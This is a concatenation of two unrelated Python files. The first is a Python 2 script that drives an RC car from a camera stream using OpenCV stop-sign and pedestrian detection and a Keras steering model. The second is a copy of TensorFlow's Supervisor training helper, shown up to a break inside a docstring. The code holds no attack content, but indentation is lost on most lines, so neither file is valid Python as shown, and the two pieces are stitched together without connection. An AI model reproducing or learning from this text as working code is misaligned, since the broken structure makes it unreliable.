autonomous_v6.py
import car
import cv2
import numpy as np
import os
import serial
import socket
import threading
import time
from imutils.object_detection import non_max_suppression
from keras.layers import Dense, Activation
from keras.models import Sequential
import keras.models
dir_log = []
SIGMA = 0.33
stop_classifier = cv2.CascadeClassifier('cascade_xml/stop_sign_pjy.xml')
timestr = time.strftime('%Y%m%d_%H%M%S')
class RCDriver(object):
def steer(self, prediction):
# FORWARD
if np.all(prediction == [ 0., 0., 1.]):
car.forward(100)
car.pause(300)
dir_log.append('Forward')
print 'Forward'
# FORWARD-LEFT
elif np.all(prediction == [ 1., 0., 0.]):
car.left(300)
car.forward_left(200)
car.left(700)
car.pause(200)
dir_log.append('Left')
print 'Left'
# FORWARD-RIGHT
elif np.all(prediction == [ 0., 1., 0.]):
car.right(300)
car.forward_right(200)
car.right(700)
car.pause(200)
dir_log.append('Right')
print 'Right'
def stop(self):
print '* * * STOPPING! * * *'
car.pause(5000)
rcdriver = RCDriver()
class ObjectDetection(object):
global rcdriver
global stop_classifier
def detect(self, cascade_classifier, gray_image, image):
# STOP SIGN
stop_sign_detected = cascade_classifier.detectMultiScale(
gray_image,
scaleFactor=1.1,
minNeighbors=10,
minSize=(35, 35),
maxSize=(45, 45))
# Draw a rectangle around stop sign
for (x_pos, y_pos, width, height) in stop_sign_detected:
cv2.rectangle(image, (x_pos+5, y_pos+5), (x_pos+width-5, y_pos+height-5), (0, 0, 255), 2)
cv2.putText(image, 'STOP SIGN', (x_pos, y_pos-10), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (0, 0, 255), 2)
# Execute the full stop
if np.any(stop_sign_detected):
rcdriver.stop()
# PEDESTRIAN
hog = cv2.HOGDescriptor()
hog.setSVMDetector(cv2.HOGDescriptor_getDefaultPeopleDetector())
orig = image.copy()
        # Look for pedestrians in the image
(rects, weights) = hog.detectMultiScale(image, winStride=(4, 4),
padding=(8, 8), scale=1.05)
# Draw the ORIGINAL bounding boxes
for (x, y, w, h) in rects:
cv2.rectangle(orig, (x, y), (x + w, y + h), (0, 0, 255), 2)
# Apply 'non-maxima suppression' to the bounding boxes using a fairly large overlap threshold to try to maintain overlapping
# boxes that are still people
rects = np.array([[x, y, x + w, y + h] for (x, y, w, h) in rects])
pick = non_max_suppression(rects, probs=None, overlapThresh=0.65)
# Draw the FINAL bounding boxes
for (xA, yA, xB, yB) in pick:
cv2.rectangle(image, (xA, yA), (xB, yB), (0, 255, 0), 2)
cv2.putText(image, 'PEDESTRIAN', (xA, yA-10), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (0, 255, 0), 2)
obj_detection = ObjectDetection()
# THIS IS A BUST. Supposed to check if car was stuck.
# See version 7, which attempts to check for signal in lower Left and Right corners of each image. If that works, "am i stuck" mode would be moot.
class DifferenceDetector(object):
global dir_log
def __init__(self):
self.previous_img = None
self.thresh = 100 # some value between 0-255.
self.ctrlz_thresh = 0.05 # e.g. if consecutive images are < 5% different (i.e. 95% the same), then activate ctrl-z mode.
self.ctrlz_iter = 10
self.difference = None
def compare(self, current_img):
# First time.
if self.previous_img is None:
self.previous_img = current_img
# All subsequent.
# cv2.threshold 'activates' (turns white) only those pixels that meet a certain threshold requirement. Everything below that is black.
# 'difference' shows the difference between two images, only showing those pixels that meet/exceed the threshold that was set.
diff = cv2.threshold(np.abs(cv2.subtract(self.previous_img, current_img)), self.thresh, 255, cv2.THRESH_BINARY)[1]
self.previous_img = current_img
self.difference = diff
return diff
def make_decision(self):
# Calculate the percent_difference to decide whether to act on 'difference'
print 'make_decision1'
        calc_difference = np.sum(self.difference)
        # Maximum possible sum of the thresholded image: every pixel at 255 (difference.size is the pixel count).
        max_difference = 255.0 * self.difference.size
        percent_difference = float(calc_difference) / max_difference
print 'make_decision2'
# If percent_difference is below ctrlz_thresh (i.e. the two images are < 5% different), then commence ctrl-z protocol.
if percent_difference <= self.ctrlz_thresh:
# Activate ctrl-z mode
print '< < < CTRL-Z MODE ACTIVATED! > > >'
# Get the last 10 directions executed from the log (or however many you specified for self.ctrlz_iter)
recent_dirs = dir_log[ -self.ctrlz_iter : ]
            # Iterate over a reversed copy (list.reverse() mutates in place and returns None).
            recent_dirs_reversed = list(reversed(recent_dirs))
            for each in recent_dirs_reversed:
# Forward -> Reverse
if each == 'Forward':
car.reverse(100)
car.pause(300)
print '< REVERSE >'
# Left -> Right
elif each == 'Left':
car.right(300)
car.reverse_right(200)
car.right(700)
car.pause(200)
print '< REVERSE-RIGHT >'
                # Right -> Left
elif each == 'Right':
car.left(300)
car.reverse_left(200)
car.left(700)
car.pause(200)
print '< REVERSE-LEFT >'
diff_detect = DifferenceDetector()
class NeuralNetwork(object):
global stop_classifier
global timestr
def __init__(self, receiving=False, piVideoObject=None):
self.receiving = receiving
self.model = keras.models.load_model('nn_h5/nn.h5')
# PiVideoStream class object is now here.
self.piVideoObject = piVideoObject
self.rcdriver = RCDriver()
print 'good NeuralNetwork_init'
self.fetch()
def auto_canny(self, blurred):
# Compute the median of the single channel pixel intensities
global SIGMA
v = np.median(blurred)
# Apply automatic Canny edge detection using the computed median of the image
lower = int(max(0, (1.0 - SIGMA) * v))
upper = int(min(255, (1.0 + SIGMA) * v))
edged = cv2.Canny(blurred, lower, upper)
return edged
    def preprocess(self, frame):
        # Flatten the 120x320 edge image (lower half of the 240x320 frame) into a 1x38400 row vector.
        image_array = frame.reshape(1, 38400).astype(np.float32)
image_array = image_array / 255.
return image_array
def predict(self, image):
image_array = self.preprocess(image)
y_hat = self.model.predict(image_array)
i_max = np.argmax(y_hat)
y_hat_final = np.zeros((1,3))
np.put(y_hat_final, i_max, 1)
return y_hat_final[0], y_hat
def fetch(self):
frame = 0
print 'good fetch1'
while self.receiving:
print 'good fetch2'
            # There's a chance that the Main thread can get to this point before the New thread begins streaming images.
            # To account for this, we initialize jpg to None and keep polling until it actually holds a frame.
jpg = None
while jpg is None:
jpg = self.piVideoObject.frame
print 'good fetch3'
gray = cv2.imdecode(np.fromstring(jpg, dtype=np.uint8), cv2.IMREAD_GRAYSCALE)
image = cv2.imdecode(np.fromstring(jpg, dtype=np.uint8), cv2.IMREAD_UNCHANGED)
print 'good fetch4'
# Object detection
obj_detection.detect(stop_classifier, gray, image)
print 'good fetch5'
# Compare current and previous images to deduce whether car is stuck (not moving)
diff_detect.compare(gray)
diff_detect.make_decision()
print 'good fetch6'
# Lower half of the grayscale image
roi = gray[120:240, :]
            # Apply Gaussian blur (reduces noise)
blurred = cv2.GaussianBlur(roi, (3, 3), 0)
# Apply Canny filter
auto = self.auto_canny(blurred)
# Show streaming images
cv2.imshow('Original', image)
cv2.imshow('What the model sees', auto)
            # Neural network model makes prediction
# prediction = self.model.predict(auto)
prediction, probas = self.predict(auto)
# Save frame and prediction record for debugging research
prediction_english = None
prediction_english_proba = None
proba_left, proba_right, proba_forward = probas[0]
if np.all(prediction == [ 0., 0., 1.]):
prediction_english = 'FORWARD'
prediction_english_proba = proba_forward
elif np.all(prediction == [ 1., 0., 0.]):
prediction_english = 'LEFT'
prediction_english_proba = proba_left
elif np.all(prediction == [ 0., 1., 0.]):
prediction_english = 'RIGHT'
prediction_english_proba = proba_right
cv2.putText(gray, "Prediction (sig={}): {}, {:>05}".format(SIGMA, prediction_english, prediction_english_proba), (10, 30), cv2.FONT_HERSHEY_SIMPLEX, .45, (255, 255, 0), 1)
cv2.imwrite('test_frames_temp/frame{:>05}.jpg'.format(frame), gray)
frame += 1
# Send prediction to driver to tell it how to steer
self.rcdriver.steer(prediction)
            if cv2.waitKey(1) & 0xFF == ord('q'):
                # 'q' pressed: stop the video stream thread and exit the fetch loop.
                self.piVideoObject.stop()
                self.receiving = False
cv2.destroyAllWindows()
class PiVideoStream(object):
def __init__(self):
self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# self.server_socket.bind(('192.168.1.66', 8000)) # The IP address of your computer (Paul's MacBook Air). This script should run before the one on the Pi.
self.server_socket.bind(('10.10.10.2', 8000)) # The IP address of your computer (Paul's MacBook Air). This script should run before the one on the Pi.
print 'Listening...'
self.server_socket.listen(0)
# Accept a single connection ('rb' is 'read binary')
self.connection = self.server_socket.accept()[0].makefile('rb')
# initialize the frame and the variable used to indicate
# if the thread should be stopped
self.frame = None
self.stopped = False
self.stream_bytes = ' '
self.start()
def start(self):
# start the thread to read frames from the video stream
print 'Starting PiVideoStream thread...'
print ' \"Hold on to your butts!\" '
# Start a new thread
t = threading.Thread(target=self.update, args=())
t.daemon=True
t.start()
print '...thread running'
# Main thread diverges from the new thread and activates the neural_network
# The piVideoObject argument ('self') passes the PiVideoStream class object to NeuralNetwork.
NeuralNetwork(receiving=True, piVideoObject=self)
def update(self):
while True:
self.stream_bytes += self.connection.read(1024)
first = self.stream_bytes.find('\xff\xd8')
last = self.stream_bytes.find('\xff\xd9')
if first != -1 and last != -1:
self.frame = self.stream_bytes[first:last + 2]
self.stream_bytes = self.stream_bytes[last + 2:]
            # if the thread indicator variable is set, stop the thread
            # and release camera resources
if self.stopped:
self.connection.close()
return
def read(self):
# return the frame most recently read
return self.frame
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
if __name__ == '__main__':
try:
# Create an instance of PiVideoStream class
video_stream = PiVideoStream()
except (KeyboardInterrupt):
# Rename the folder that collected all of the test frames. Then make a new folder to collect next round of test frames.
os.rename( './test_frames_temp', './test_frames_SAVED/test_frames_{}'.format(timestr))
os.makedirs('./test_frames_temp')
print '\nTerminating\n'
car.pause(10000)
video_stream.stop()
print '\n! Received keyboard interrupt, quitting threads.\n'
finally:
video_stream.connection.close()
print '...done.\n'
supervisor.py
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Training helper that checkpoints models and computes summaries."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import os
import time
from tensorflow.core.framework.summary_pb2 import Summary
from tensorflow.core.util.event_pb2 import SessionLog
from tensorflow.python import summary as _summary
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import meta_graph
from tensorflow.python.framework import ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import coordinator
from tensorflow.python.training import saver as saver_mod
from tensorflow.python.training import session_manager as session_manager_mod
from tensorflow.python.training import summary_io
from tensorflow.python.training import training_util
class Supervisor(object):
"""A training helper that checkpoints models and computes summaries.
The Supervisor is a small wrapper around a `Coordinator`, a `Saver`,
and a `SessionManager` that takes care of common needs of TensorFlow
training programs.
#### Use for a single program
```python
with tf.Graph().as_default():
...add operations to the graph...
# Create a Supervisor that will checkpoint the model in '/tmp/mydir'.
sv = Supervisor(logdir='/tmp/mydir')
# Get a TensorFlow session managed by the supervisor.
with sv.managed_session(FLAGS.master) as sess:
# Use the session to train the graph.
while not sv.should_stop():
sess.run(<my_train_op>)
```
Within the `with sv.managed_session()` block all variables in the graph have
been initialized. In addition, a few services have been started to
checkpoint the model and add summaries to the event log.
If the program crashes and is restarted, the managed session automatically
  reinitializes variables from the most recent checkpoint.
The supervisor is notified of any exception raised by one of the services.
After an exception is raised, `should_stop()` returns `True`. In that case
the training loop should also stop. This is why the training loop has to
check for `sv.should_stop()`.
Exceptions that indicate that the training inputs have been exhausted,
`tf.errors.OutOfRangeError`, also cause `sv.should_stop()` to return `True`
but are not re-raised from the `with` block: they indicate a normal
termination.
#### Use for multiple replicas
To train with replicas you deploy the same program in a `Cluster`.
One of the tasks must be identified as the *chief*: the task that handles
initialization, checkpoints, summaries, and recovery. The other tasks
depend on the *chief* for these services.
The only change you have to do to the single program code is to indicate
if the program is running as the *chief*.
```python
# Choose a task as the chief. This could be based on server_def.task_index,
# or job_def.name, or job_def.tasks. It's entirely up to the end user.
# But there can be only one *chief*.
is_chief = (server_def.task_index == 0)
server = tf.train.Server(server_def)
with tf.Graph().as_default():
...add operations to the graph...
# Create a Supervisor that uses log directory on a shared file system.
# Indicate if you are the 'chief'
sv = Supervisor(logdir='/shared_directory/...', is_chief=is_chief)
# Get a Session in a TensorFlow server on the cluster.
with sv.managed_session(server.target) as sess:
# Use the session to train the graph.
while not sv.should_stop():
sess.run(<my_train_op>)
```
In the *chief* task, the `Supervisor` works exactly as in the first example
above. In the other tasks `sv.managed_session()` waits for the Model to have
been initialized before returning a session to the training code. The
non-chief tasks depend on the chief task for initializing the model.
If one of the tasks crashes and restarts, `managed_session()`
checks if the Model is initialized. If yes, it just creates a session and
returns it to the training code that proceeds normally. If the model needs
to be initialized, the chief task takes care of reinitializing it; the other
tasks just wait for the model to have been initialized.
NOTE: This modified program still works fine as a single program.
The single program marks itself as the chief.
#### What `master` string to use
Whether you are running on your machine or in the cluster you can use the
following values for the --master flag:
* Specifying `''` requests an in-process session that does not use RPC.
* Specifying `'local'` requests a session that uses the RPC-based
"Master interface" to run TensorFlow programs. See
[`tf.train.Server.create_local_server()`](#Server.create_local_server) for
details.
  * Specifying `'grpc://hostname:port'` requests a session that uses
    the RPC interface to a specific host, and also allows the in-process
    master to access remote tensorflow workers. Often, it is
    appropriate to pass `server.target` (for some `tf.train.Server`
    named `server`).
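  As a rough illustrative sketch (the literal `grpc://hostname:2222` address
  below is a placeholder; in practice you would usually pass `server.target`
  from your `tf.train.Server`):
  ```python
  # In-process session, no RPC:
  sv = Supervisor(logdir='/tmp/mydir')
  with sv.managed_session('') as sess:
    sess.run(<my_train_op>)

  # Or, an RPC-based session on a specific TensorFlow server:
  with sv.managed_session('grpc://hostname:2222') as sess:
    sess.run(<my_train_op>)
  ```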
#### Advanced use
##### Launching additional services
`managed_session()` launches the Checkpoint and Summary services (threads).
If you need more services to run you can simply launch them in the block
controlled by `managed_session()`.
Example: Start a thread to print losses. We want this thread to run
every 60 seconds, so we launch it with `sv.loop()`.
```python
...
sv = Supervisor(logdir='/tmp/mydir')
with sv.managed_session(FLAGS.master) as sess:
    sv.loop(60, print_loss, (sess,))
while not sv.should_stop():
sess.run(my_train_op)
```
##### Launching fewer services
`managed_session()` launches the "summary" and "checkpoint" threads which use
  either the optional `summary_op` and `saver` passed to the constructor, or
default ones created automatically by the supervisor. If you want to run
your own summary and checkpointing logic, disable these services by passing
`None` to the `summary_op` and `saver` parameters.
Example: Create summaries manually every 100 steps in the chief.
```python
# Create a Supervisor with no automatic summaries.
sv = Supervisor(logdir='/tmp/mydir', is_chief=is_chief, summary_op=None)
# As summary_op was None, managed_session() does not start the
# summary thread.
with sv.managed_session(FLAGS.master) as sess:
for step in xrange(1000000):
if sv.should_stop():
break
if is_chief and step % 100 == 0:
# Create the summary every 100 chief steps.
sv.summary_computed(sess, sess.run(my_summary_op))
else:
# Train normally
sess.run(my_train_op)
```
##### Custom model initialization
`managed_session()` only supports initializing the model by running an
`init_op` or restoring from the latest checkpoint. If you have special
initialization needs, see how to specify a `local_init_op` when creating the
supervisor. You can also use the `SessionManager` directly to create a
session and check if it could be initialized automatically.
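  For example, a sketch of custom initialization through `init_fn` (the
  variable subset and checkpoint path below are placeholders, not part of this
  module):
  ```python
  # Restore part of the model from a pre-trained checkpoint after `init_op` runs.
  pretrain_saver = tf.train.Saver(var_list=<subset_of_variables>)

  def restore_pretrained(sess):
    pretrain_saver.restore(sess, '/tmp/pretrained/model.ckpt')

  sv = Supervisor(logdir='/tmp/mydir', init_fn=restore_pretrained)
  with sv.managed_session(FLAGS.master) as sess:
    while not sv.should_stop():
      sess.run(<my_train_op>)
  ```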
@@__init__
@@managed_session
@@prepare_or_wait_for_session
@@start_standard_services
@@start_queue_runners
@@summary_computed
@@stop
@@request_stop
@@should_stop
@@stop_on_exception
@@wait_for_stop
"""
# Value to pass for the 'ready_op', 'init_op', 'summary_op', 'saver',
# and 'global_step' parameters of Supervisor.__init__() to indicate that
# the default behavior should be used.
USE_DEFAULT = 0
def __init__(self,
graph=None,
ready_op=USE_DEFAULT,
ready_for_local_init_op=USE_DEFAULT,
is_chief=True,
init_op=USE_DEFAULT,
init_feed_dict=None,
local_init_op=USE_DEFAULT,
logdir=None,
summary_op=USE_DEFAULT,
saver=USE_DEFAULT,
global_step=USE_DEFAULT,
save_summaries_secs=120,
save_model_secs=600,
recovery_wait_secs=30,
stop_grace_secs=120,
checkpoint_basename="model.ckpt",
session_manager=None,
summary_writer=USE_DEFAULT,
init_fn=None):
"""Create a `Supervisor`.
Args:
graph: A `Graph`. The graph that the model will use. Defaults to the
default `Graph`. The supervisor may add operations to the graph before
creating a session, but the graph should not be modified by the caller
after passing it to the supervisor.
ready_op: 1-D string `Tensor`. This tensor is evaluated by supervisors in
`prepare_or_wait_for_session()` to check if the model is ready to use.
The model is considered ready if it returns an empty array. Defaults to
        the tensor returned from `tf.report_uninitialized_variables()`. If
`None`, the model is not checked for readiness.
ready_for_local_init_op: 1-D string `Tensor`. This tensor is evaluated by
supervisors in `prepare_or_wait_for_session()` to check if the model is
ready to run the local_init_op.
The model is considered ready if it returns an empty array. Defaults to
the tensor returned from
`tf.report_uninitialized_variables(tf.global_variables())`. If `None`, the
model is not checked for readiness before running local_init_op.
is_chief: If True, create a chief supervisor in charge of initializing
and restoring the model. If False, create a supervisor that relies
on a chief supervisor for inits and restore.
init_op: `Operation`. Used by chief supervisors to initialize the model
when it can not be recovered. Defaults to an `Operation` that
initializes all variables. If `None`, no initialization is done
automatically unless you pass a value for `init_fn`, see below.
init_feed_dict: A dictionary that maps `Tensor` objects to feed values.
This feed dictionary will be used when `init_op` is evaluated.
local_init_op: `Operation`. Used by all supervisors to run initializations
that should run for every new supervisor instance. By default these
are table initializers and initializers for local variables.
If `None`, no further per supervisor-instance initialization is
done automatically.
logdir: A string. Optional path to a directory where to checkpoint the
model and log events for the visualizer. Used by chief supervisors.
The directory will be created if it does not exist.
summary_op: An `Operation` that returns a Summary for the event logs.
Used by chief supervisors if a `logdir` was specified. Defaults to the
operation returned from summary.merge_all(). If `None`, summaries are
not computed automatically.
saver: A Saver object. Used by chief supervisors if a `logdir` was
        specified. Defaults to the saver returned by Saver().
If `None`, the model is not saved automatically.
global_step: An integer Tensor of size 1 that counts steps. The value
from 'global_step' is used in summaries and checkpoint filenames.
        Defaults to the op named 'global_step' in the graph if it exists, is of
rank 1, size 1, and of type tf.int32 or tf.int64. If `None` the global
step is not recorded in summaries and checkpoint files. Used by chief
supervisors if a `logdir` was specified.
save_summaries_secs: Number of seconds between the computation of
summaries for the event log. Defaults to 120 seconds. Pass 0 to
disable summaries.
save_model_secs: Number of seconds between the creation of model
checkpoints. Defaults to 600 seconds. Pass 0 to disable checkpoints.
recovery_wait_secs: Number of seconds between checks that the model
is ready. Used by supervisors when waiting for a chief supervisor
to initialize or restore the model. Defaults to 30 seconds.
stop_grace_secs: Grace period, in seconds, given to running threads to
stop when `stop()` is called. Defaults to 120 seconds.
checkpoint_basename: The basename for checkpoint saving.
session_manager: `SessionManager`, which manages Session creation and
recovery. If it is `None`, a default `SessionManager` will be created
with the set of arguments passed in for backwards compatibility.
summary_writer: `SummaryWriter` to use or `USE_DEFAULT`. Can be `None`
to indicate that no summaries should be written.
init_fn: Optional callable used to initialize the model. Called
after the optional `init_op` is called. The callable must accept one
argument, the session being initialized.
Returns:
A `Supervisor`.
"""
# Set default values of arguments.
if graph is None:
graph = ops.get_default_graph()
with graph.as_default():
self._init_ready_op(
ready_op=ready_op, ready_for_local_init_op=ready_for_local_init_op)
self._init_init_op(init_op=init_op, init_feed_dict=init_feed_dict)
self._init_local_init_op(local_init_op=local_init_op)
self._init_saver(saver=saver)
self._init_summary_op(summary_op=summary_op)
self._init_global_step(global_step=global_step)
self._graph = graph
self._meta_graph_def = meta_graph.create_meta_graph_def(
graph_def=graph.as_graph_def(add_shapes=True),
saver_def=self._saver.saver_def if self._saver else None)
self._is_chief = is_chief
self._coord = coordinator.Coordinator()
self._recovery_wait_secs = recovery_wait_secs
self._stop_grace_secs = stop_grace_secs
self._init_fn = init_fn
# Set all attributes related to checkpointing and writing events to None.
# Afterwards, set them appropriately for chief supervisors, as these are
# the only supervisors that can write checkpoints and events.
self._logdir = None
self._save_summaries_secs = None
self._save_model_secs = None
self._save_path = None
self._summary_writer = None
if self._is_chief:
self._logdir = logdir
self._save_summaries_secs = save_summaries_secs
self._save_model_secs = save_model_secs
if self._logdir:
self._save_path = os.path.join(self._logdir, checkpoint_basename)
if summary_writer is Supervisor.USE_DEFAULT:
if self._logdir:
self._summary_writer = summary_io.SummaryWriter(self._logdir)
else:
self._summary_writer = summary_writer
self._graph_added_to_summary = False
self._init_session_manager(session_manager=session_manager)
self._verify_setup()
# The graph is not allowed to change anymore.
graph.finalize()
def _init_session_manager(self, session_manager=None):
if session_manager is None:
self._session_manager = session_manager_mod.SessionManager(
local_init_op=self._local_init_op,
ready_op=self._ready_op,
ready_for_local_init_op=self._ready_for_local_init_op,
graph=self._graph,
recovery_wait_secs=self._recovery_wait_secs)
else:
self._session_manager = session_manager
def _get_first_op_from_collection(self, key):
"""Returns the first `Operation` from a collection.
Args:
key: A string collection key.
Returns:
The first Op found in a collection, or `None` if the collection is empty.
"""
try:
op_list = ops.get_collection(key)
if len(op_list) > 1:
logging.info("Found %d %s operations. Returning the first one.",
len(op_list), key)
if op_list:
return op_list[0]
except LookupError:
pass
return None
def _init_ready_op(self,
ready_op=USE_DEFAULT,
ready_for_local_init_op=USE_DEFAULT):
"""Initializes ready_op.
Args:
ready_op: `Tensor` to check if the model is initialized.
If it's set to USE_DEFAULT, creates an op that checks all
the variables are initialized.
ready_for_local_init_op: `Tensor` to check if the model is ready to run
local_init_op.
If it's set to USE_DEFAULT, creates an op that checks all
the global variables are initialized.
"""
if ready_op is Supervisor.USE_DEFAULT:
ready_op = self._get_first_op_from_collection(ops.GraphKeys.READY_OP)
if ready_op is None:
ready_op = variables.report_uninitialized_variables()
ops.add_to_collection(ops.GraphKeys.READY_OP, ready_op)
self._ready_op = ready_op
# ready_for_local_init_op defaults to None for backward compatibility
if ready_for_local_init_op is Supervisor.USE_DEFAULT:
ready_for_local_init_op = self._get_first_op_from_collection(
ops.GraphKeys.READY_FOR_LOCAL_INIT_OP)
self._ready_for_local_init_op = ready_for_local_init_op
def _init_init_op(self, init_op=USE_DEFAULT, init_feed_dict=None):
"""Initializes init_op.
Args:
init_op: `Operation` to initialize the variables. If set to USE_DEFAULT,
create an op that initializes all variables and tables.
init_feed_dict: A dictionary that maps `Tensor` objects to feed values.
This feed dictionary will be used when `init_op` is evaluated.
"""
if init_op is Supervisor.USE_DEFAULT:
init_op = self._get_first_op_from_collection(ops.GraphKeys.INIT_OP)
if init_op is None:
init_op = variables.global_variables_initializer()
ops.add_to_collection(ops.GraphKeys.INIT_OP, init_op)
self._init_op = init_op
self._init_feed_dict = init_feed_dict
def _init_local_init_op(self, local_init_op=USE_DEFAULT):
"""Initializes local_init_op.
Args:
local_init_op: `Operation` run for every new supervisor instance. If set
to USE_DEFAULT, use the first op from the GraphKeys.LOCAL_INIT_OP
collection. If the collection is empty, create an op that initializes
all local variables and all tables.
"""
if local_init_op is Supervisor.USE_DEFAULT:
local_init_op = self._get_first_op_from_collection(
ops.GraphKeys.LOCAL_INIT_OP)
if local_init_op is None:
op_list = [variables.local_variables_initializer(),
data_flow_ops.initialize_all_tables()]
if op_list:
local_init_op = control_flow_ops.group(*op_list)
ops.add_to_collection(ops.GraphKeys.LOCAL_INIT_OP, local_init_op)
self._local_init_op = local_init_op
def _init_saver(self, saver=USE_DEFAULT):
"""Initializes saver.
Args:
saver: A `Saver` object. If set to USE_DEFAULT, create one that
saves all the variables.
"""
if saver is Supervisor.USE_DEFAULT:
saver = self._get_first_op_from_collection(ops.GraphKeys.SAVERS)
if saver is None and variables.global_variables():
saver = saver_mod.Saver()
ops.add_to_collection(ops.GraphKeys.SAVERS, saver)
self._saver = saver
def _init_summary_op(self, summary_op=USE_DEFAULT):
"""Initializes summary_op.
Args:
summary_op: An Operation that returns a Summary for the event logs.
If set to USE_DEFAULT, create an op that merges all the summaries.
"""
if summary_op is Supervisor.USE_DEFAULT:
summary_op = self._get_first_op_from_collection(ops.GraphKeys.SUMMARY_OP)
if summary_op is None:
summary_op = _summary.merge_all()
if summary_op is not None:
ops.add_to_collection(ops.GraphKeys.SUMMARY_OP, summary_op)
self._summary_op = summary_op
def _init_global_step(self, global_step=USE_DEFAULT):
"""Initializes global_step.
Args:
global_step: An integer Tensor of size 1 that counts steps. If
set to USE_DEFAULT, creates global_step tensor.
"""
if global_step is Supervisor.USE_DEFAULT:
global_step = self._get_first_op_from_collection(
ops.GraphKeys.GLOBAL_STEP)
if global_step is None:
global_step = self._default_global_step_tensor()
if global_step is not None:
ops.add_to_collection(ops.GraphKeys.GLOBAL_STEP, global_step)
self._global_step = global_step
@property
def is_chief(self):
"""Return True if this is a chief supervisor.
Returns:
A bool.
"""
return self._is_chief
@property
def session_manager(self):
"""Return the SessionManager used by the Supervisor.
Returns:
A SessionManager object.
"""
return self._session_manager
@property
def coord(self):
"""Return the Coordinator used by the Supervisor.
The Coordinator can be useful if you want to run multiple threads
during your training.
Returns:
A Coordinator object.
"""
return self._coord
@property
def init_op(self):
"""Return the Init Op used by the supervisor.
Returns:
An Op or `None`.
"""
return self._init_op
@property
def init_feed_dict(self):
"""Return the feed dictionary used when evaluating the `init_op`.
Returns:
A feed dictionary or `None`.
"""
return self._init_feed_dict
@property
def ready_op(self):
"""Return the Ready Op used by the supervisor.
Returns:
An Op or `None`.
"""
return self._ready_op
@property
def ready_for_local_init_op(self):
return self._ready_for_local_init_op
@property
def summary_writer(self):
"""Return the SummaryWriter used by the chief supervisor.
Returns:
A SummaryWriter.
"""
return self._summary_writer
@property
def summary_op(self):
"""Return the Summary Tensor used by the chief supervisor.
Returns:
A string Tensor for the summary or `None`.
"""
return self._summary_op
@property
def save_summaries_secs(self):
"""Return the delay between summary computations.
Returns:
A timestamp.
"""
return self._save_summaries_secs
@property
def global_step(self):
"""Return the global_step Tensor used by the supervisor.
Returns:
An integer Tensor for the global_step.
"""
return self._global_step
@property
def saver(self):
"""Return the Saver used by the supervisor.
Returns:
A Saver object.
"""
return self._saver
@property
def save_model_secs(self):
"""Return the delay between checkpoints.
Returns:
      The number of seconds between checkpoints.
"""
return self._save_model_secs
@property
def save_path(self):
"""Return the save path used by the supervisor.
Returns:
A string.
"""
return self._save_path
def _write_graph(self):
"""Writes graph_def to `logdir` and adds it to summary if applicable."""
assert self._is_chief
if self._logdir:
training_util.write_graph(self._graph.as_graph_def(add_shapes=True),
self._logdir, "graph.pbtxt")
if self._summary_writer and not self._graph_added_to_summary:
self._summary_writer.add_graph(self._graph)
self._summary_writer.add_meta_graph(self._meta_graph_def)
self._graph_added_to_summary = True
def start_standard_services(self, sess):
"""Start the standard services for 'sess'.
This starts services in the background. The services started depend
on the parameters to the constructor and may include:
- A Summary thread computing summaries every save_summaries_secs.
- A Checkpoint thread saving the model every save_model_secs.
      - A StepCounter thread measuring step time.
Args:
sess: A Session.
Returns:
A list of threads that are running the standard services. You can use
the Supervisor's Coordinator to join these threads with:
sv.coord.Join(<list of threads>)
Raises:
RuntimeError: If called with a non-chief Supervisor.
      ValueError: If no `logdir` was passed to the constructor, as the
services need a log directory.
"""
if not self._is_chief:
raise RuntimeError("Only chief supervisor can start standard services. "
"Because only chief supervisors can write events.")
if not self._logdir:
logging.warning("Standard services need a 'logdir' "
"passed to the SessionManager")
return
if self._global_step is not None and self._summary_writer:
# Only add the session log if we keep track of global step.
# TensorBoard cannot use START message for purging expired events
# if there is no step value.
current_step = training_util.global_step(sess, self._global_step)
self._summary_writer.add_session_log(
SessionLog(status=SessionLog.START),
current_step)
threads = []
if self._save_summaries_secs and self._summary_writer:
if self._summary_op is not None:
threads.append(SVSummaryThread(self, sess))
if self._global_step is not None:
threads.append(SVStepCounterThread(self, sess))
if self.saver and self._save_model_secs:
threads.append(SVTimerCheckpointThread(self, sess))
for t in threads:
t.start()
return threads
def prepare_or_wait_for_session(self, master="", config=None,
wait_for_checkpoint=False,
max_wait_secs=7200,
start_standard_services=True):
"""Make sure the model is ready to be used.
Create a session on 'master', recovering or initializing the model as
needed, or wait for a session to be ready. If running as the chief
    and `start_standard_services` is set to True, also call the session
manager to start the standard services.
Args:
master: name of the TensorFlow master to use. See the `tf.Session`
constructor for how this is interpreted.
config: Optional ConfigProto proto used to configure the session,
which is passed as-is to create the session.
wait_for_checkpoint: Whether we should wait for the availability of a
checkpoint before creating Session. Defaults to False.
max_wait_secs: Maximum time to wait for the session to become available.
start_standard_services: Whether to start the standard services and the
queue runners.
Returns:
A Session object that can be used to drive the model.
"""
# For users who recreate the session with prepare_or_wait_for_session(), we
# need to clear the coordinator's stop_event so that threads managed by the
# coordinator can run.
self._coord.clear_stop()
if self._summary_writer:
self._summary_writer.reopen()
if self._is_chief:
sess = self._session_manager.prepare_session(
master, init_op=self.init_op, saver=self.saver,
checkpoint_dir=self._logdir, wait_for_checkpoint=wait_for_checkpoint,
max_wait_secs=max_wait_secs, config=config,
init_feed_dict=self._init_feed_dict, init_fn=self._init_fn)
self._write_graph()
if start_standard_services:
self.start_standard_services(sess)
else:
sess = self._session_manager.wait_for_session(master,
config=config,
max_wait_secs=max_wait_secs)
if start_standard_services:
self.start_queue_runners(sess)
return sess
def start_queue_runners(self, sess, queue_runners=None):
"""Start threads for `QueueRunners`.
